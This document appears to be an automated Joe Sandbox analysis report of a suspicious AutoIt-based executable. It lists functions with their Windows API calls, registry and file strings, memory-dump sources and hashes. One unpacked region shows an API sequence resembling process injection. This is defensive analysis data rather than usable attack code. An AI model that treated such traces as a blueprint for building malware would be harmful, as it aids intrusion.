Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
Instruction Fuzzy Hash: 8CA1F874E00209EBEB14DFE4C999BEEBBB5FF48305F208199E501BB281D7759A41CB94

Function 00FE49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00FE4A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 010541DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0105421A
RegCloseKey.ADVAPI32(?), ref: 01054249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00FE4A13
Include, xrefs: 010541D3, 01054212

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: a6568711fdfc124e37b3a5245d3bc8255c2f32d219ccbebd334021552be99287
Instruction ID: 76d249adb900c42c1f8d67a8ff43973af5e6a706cf43bd63aaa955b132decafc
Opcode Fuzzy Hash: a6568711fdfc124e37b3a5245d3bc8255c2f32d219ccbebd334021552be99287
Instruction Fuzzy Hash: 13116071A00109BEEB10ABE5CD86EFF7BBCEF04754B000068F542D6151EA75AE41AB50

Function 00FE36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FE36E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FE3707
ShowWindow.USER32(00000000,?,?,?,?,00FE3AA3,?), ref: 00FE371B
ShowWindow.USER32(00000000,?,?,?,?,00FE3AA3,?), ref: 00FE3724

Strings

edit, xrefs: 00FE3701
AutoIt v3, xrefs: 00FE36DE, 00FE36E3, 00FE36E4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: dcdb267dc62cbd472fcd77171c979ec0cec6f94480ad5c1978fd3e98934662e6
Instruction ID: 02c874f59bb53feede7079e275ed9625e0ba25ab62faa06c8c2719e025477caf
Opcode Fuzzy Hash: dcdb267dc62cbd472fcd77171c979ec0cec6f94480ad5c1978fd3e98934662e6
Instruction Fuzzy Hash: 24F0F471B846E07AD7315657AC08E773E7DE7C6F20F40001FFA8496194D5BA0855DB71

Function 00A85D50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A85C40: Sleep.KERNELBASE(000001F4), ref: 00A85C51

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A85EBD

Strings

B4WY6XOXX37XDJTXSGAQORVD57, xrefs: 00A85F23, 00A85F26

Memory Dump Source

Source File: 00000000.00000002.2033236990.0000000000A83000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A83000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a83000_A2028041200SD.jbxd

Similarity

API ID: CreateFileSleep
String ID: B4WY6XOXX37XDJTXSGAQORVD57
API String ID: 2694422964-2080869282
Opcode ID: 9406218d7a506acfc73751d3a801627c6d6d814a985c13e85414ef384db6c1b8
Instruction ID: 4bf72f30d90c656b618cab6114c68c5afd07fd84e56cc1b97a30cc460e199103
Opcode Fuzzy Hash: 9406218d7a506acfc73751d3a801627c6d6d814a985c13e85414ef384db6c1b8
Instruction Fuzzy Hash: 85618330D04288DBEF11DBB4C844BDEBB75AF19304F044199E648BB2C1D7BA0B49CB66

Function 00FE51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FE522F
_wcscpy.LIBCMT ref: 00FE5283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FE5293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 01053CB0

Strings

Line: , xrefs: 01053CD9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 3d77527cd2dc0f2b9ca13181b55ff10d4c5c47f6cd8ae62f8e4fb6053932a9ba
Instruction ID: e297e33b4b8e29956b7ecbe18be086a84eb6dfddf9a9c8b5ba7cf87c202dbbe2
Opcode Fuzzy Hash: 3d77527cd2dc0f2b9ca13181b55ff10d4c5c47f6cd8ae62f8e4fb6053932a9ba
Instruction Fuzzy Hash: 2531CD71508784AFD331EB61DC42FDF7BD8AB84754F40451EF6C986081EBB8A608DB96

Function 00FE4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00FE41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00FE39FE,?,00000001), ref: 00FE41DB

_free.LIBCMT ref: 010536B7
_free.LIBCMT ref: 010536FE

Part of subcall function 00FEC833: __wsplitpath.LIBCMT ref: 00FEC93E
Part of subcall function 00FEC833: _wcscpy.LIBCMT ref: 00FEC953
Part of subcall function 00FEC833: _wcscat.LIBCMT ref: 00FEC968
Part of subcall function 00FEC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00FEC978

Strings

Bad directive syntax error, xrefs: 010536E4
>>>AUTOIT SCRIPT<<<, xrefs: 01053491

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 70e13df13d90a217397bc0ec3798022b102ba15f518ff4fda6ca508e191db07a
Instruction ID: e8f059753be4b55a41c316eded6ccfce24280a75de516afa9ac9cf6fa7acb7c6
Opcode Fuzzy Hash: 70e13df13d90a217397bc0ec3798022b102ba15f518ff4fda6ca508e191db07a
Instruction Fuzzy Hash: F691A231910259AFCF04EFA9CC519EEBBB4FF18354F04406EF956AB291DB34A905DBA0

Function 00FE4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FE5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010A1148,?,00FE61FF,?,00000000,00000001,00000000), ref: 00FE5392

Part of subcall function 00FE49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00FE4A1D

_wcscat.LIBCMT ref: 01052D80
_wcscat.LIBCMT ref: 01052DB5

Strings

\, xrefs: 01052DA2
\Include\, xrefs: 00FE4B0A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: 5cfe97f7bef26d9e89e58efc62056a5b3b72b710a0e0d3413fa1e2a4c423c18b
Instruction ID: e0cb09c99cb6c1aa7fca78aac1252b949f1e08a12bb5ebb9e90ad17935c94571
Opcode Fuzzy Hash: 5cfe97f7bef26d9e89e58efc62056a5b3b72b710a0e0d3413fa1e2a4c423c18b
Instruction Fuzzy Hash: 5C5194794047849FC324EF5AD98189AB7F4FFA9300B80053EF6C5C7244EB39A548DB52

Function 010034AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 010034FE

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 01003539
__wopenfile.LIBCMT ref: 01003549

Strings

<G, xrefs: 010034CD, 010034F0, 010034FC

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 49029396b5987ae29e8a723de30ff1374c7b3ebcbbac7514b4130b3a13f2ae07
Instruction ID: b32e8c8d85fc9c22524be216909fc72137c1221957b300b5112e32c6fe9b3e95
Opcode Fuzzy Hash: 49029396b5987ae29e8a723de30ff1374c7b3ebcbbac7514b4130b3a13f2ae07
Instruction Fuzzy Hash: 6211C170A00207DEFB63BF7588406AE36E4BF15250F058869D895DF2D0EE35D95197A1

Function 00FFD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FFD28B,SwapMouseButtons,00000004,?), ref: 00FFD2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FFD28B,SwapMouseButtons,00000004,?,?,?,?,00FFC865), ref: 00FFD2DD
RegCloseKey.KERNELBASE(00000000,?,?,00FFD28B,SwapMouseButtons,00000004,?,?,?,?,00FFC865), ref: 00FFD2FF

Strings

Control Panel\Mouse, xrefs: 00FFD2BA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: be5d59153838d1e4efaf56271513947f408f7ba0dd222c1c8ee121b1394d0df9
Instruction ID: 13a87af4f79afccce874d46abb654a5c6adee4dd81ba37ed1fe7018c9b749031
Opcode Fuzzy Hash: be5d59153838d1e4efaf56271513947f408f7ba0dd222c1c8ee121b1394d0df9
Instruction Fuzzy Hash: 77113C75A1120CBFEB218FA4D888EBF7BBDEF44754B104469FA45D7220D6319E41AB60

Function 00A84C40 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A853FB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A85491
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A854B3

Memory Dump Source

Source File: 00000000.00000002.2033236990.0000000000A83000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A83000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a83000_A2028041200SD.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
Instruction ID: d3542462ae196b1ce6b0b9d79440bac55ccbdcfada2dbe5ab35b438888c0a33e
Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
Instruction Fuzzy Hash: E6620B30E14658DBEB24DFA4C850BDEB372EF58300F1095A9D50DEB290E77A9E81CB59

Function 0102C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00FE4517: _fseek.LIBCMT ref: 00FE452F

Part of subcall function 0102C56D: _wcscmp.LIBCMT ref: 0102C65D
Part of subcall function 0102C56D: _wcscmp.LIBCMT ref: 0102C670

_free.LIBCMT ref: 0102C4DD
_free.LIBCMT ref: 0102C4E4
_free.LIBCMT ref: 0102C54F

Part of subcall function 01001C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,01007A85), ref: 01001CB1
Part of subcall function 01001C9D: GetLastError.KERNEL32(00000000,?,01007A85), ref: 01001CC3

_free.LIBCMT ref: 0102C557

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction ID: 46d53aaf5709e862b76b0048ef026d3de2c7517a8fdea0ebdecfde63ddfb3364
Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction Fuzzy Hash: 3E5151B1904269AFDF159F64DC80BEDBBB9FF48300F10009EF659A7281DB715A808F59

Function 00FE40E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01053725
GetOpenFileNameW.COMDLG32 ref: 0105376F

Part of subcall function 00FE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FE53B1,?,?,00FE61FF,?,00000000,00000001,00000000), ref: 00FE662F

Part of subcall function 00FE40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE40C6

Strings

X, xrefs: 0105373E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: d17025b3857b8655efaf5319fdf7e8cd7bf92a1d4ffe21aac0627b53943beed5
Instruction ID: f24c10de6e5fa365cc82985872358e275ffe744527b41474021b4402d1262156
Opcode Fuzzy Hash: d17025b3857b8655efaf5319fdf7e8cd7bf92a1d4ffe21aac0627b53943beed5
Instruction Fuzzy Hash: B2210871A001889FDF52DFD8CC057DE7BF8AF48300F00805AE444EB241DBB866899F61

Function 0102C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0102C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0102C746

Strings

aut, xrefs: 0102C740

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 8a6273f288fe5b8ba5d39afa2191ea355f434090d6127bc8b65227bb2fc2297b
Instruction ID: d0016364c0914970ddaf83f5177a73a7665122deb872208d959c69ea789cc0a9
Opcode Fuzzy Hash: 8a6273f288fe5b8ba5d39afa2191ea355f434090d6127bc8b65227bb2fc2297b
Instruction Fuzzy Hash: 50D05E7160030FABDB20ABE0DC0EF8A776CA714704F0001A0B6D0E90B1DABAE6998B54

Function 0103F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fadf867f33f946fcb1b7d45532f3a9199838f5dd27d134640f29ba08e1a060a
Instruction ID: 2aa639a621380c01399ed7486783736804054b269b9d46542998599dbfb1abc9
Opcode Fuzzy Hash: 6fadf867f33f946fcb1b7d45532f3a9199838f5dd27d134640f29ba08e1a060a
Instruction Fuzzy Hash: 3FF17B71A043029FC714DF28C984B6EB7E5BFC8314F14896EF9999B291DB74E905CB82

Function 00FE4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FE5022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FE50CB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: ba032ee5f739c883231912cb86dd02bc605d1a01152c7a74ddf9602d2286d40e
Instruction ID: fe76b48b5d49a145a328da52154c7c930024e601f4422bd049baab8d95c820c8
Opcode Fuzzy Hash: ba032ee5f739c883231912cb86dd02bc605d1a01152c7a74ddf9602d2286d40e
Instruction Fuzzy Hash: 36319CB1604B419FD371DF65D44069BBBE4FB48718F00092EF6DA86241E7766944CB92

Function 0100395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 01003973

Part of subcall function 010081C2: __NMSG_WRITE.LIBCMT ref: 010081E9
Part of subcall function 010081C2: __NMSG_WRITE.LIBCMT ref: 010081F3

__NMSG_WRITE.LIBCMT ref: 0100397A

Part of subcall function 0100821F: GetModuleFileNameW.KERNEL32(00000000,010A0312,00000104,00000000,00000001,00000000), ref: 010082B1
Part of subcall function 0100821F: ___crtMessageBoxW.LIBCMT ref: 0100835F

Part of subcall function 01001145: ___crtCorExitProcess.LIBCMT ref: 0100114B
Part of subcall function 01001145: ExitProcess.KERNEL32 ref: 01001154

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,00000001,00000000,?,?,00FFF507,?,0000000E), ref: 0100399F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 400624eb80825c55ebaf0a1bd68199a191556725cb873dfe205ff0c01691ecb4
Instruction ID: 8677eb6fd31a31fe8db84290ce57b705e196b10594fc0a0fb3004ab6cacd62d5
Opcode Fuzzy Hash: 400624eb80825c55ebaf0a1bd68199a191556725cb873dfe205ff0c01691ecb4
Instruction Fuzzy Hash: C601B136385606AEF6633B6CE855BAE3388BF91760F11006EE5C59F2C4DF79D80086A1

Function 0102C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0102C385,?,?,?,?,?,00000004), ref: 0102C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0102C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0102C708
CloseHandle.KERNEL32(00000000,?,0102C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0102C70F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 8daa80933d119125b4c1be4958c57d641a1e896ec50feee886baf4672fc92d62
Instruction ID: bdb25c1a0c065c403a43c8b9ca3b2af2d8dcbcf9f9d05947896e4250a8db5a54
Opcode Fuzzy Hash: 8daa80933d119125b4c1be4958c57d641a1e896ec50feee886baf4672fc92d62
Instruction Fuzzy Hash: C9E08632280224B7E7311A94AC09FCE7F58AB05760F104110FBD4690E097F625118798

Function 0102BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0102BB72

Part of subcall function 01001C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,01007A85), ref: 01001CB1
Part of subcall function 01001C9D: GetLastError.KERNEL32(00000000,?,01007A85), ref: 01001CC3

_free.LIBCMT ref: 0102BB83
_free.LIBCMT ref: 0102BB95

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: 26287f56e6b2f06d03c90d1c823e61c5769377aedbd66dc09d496c9406694d58
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
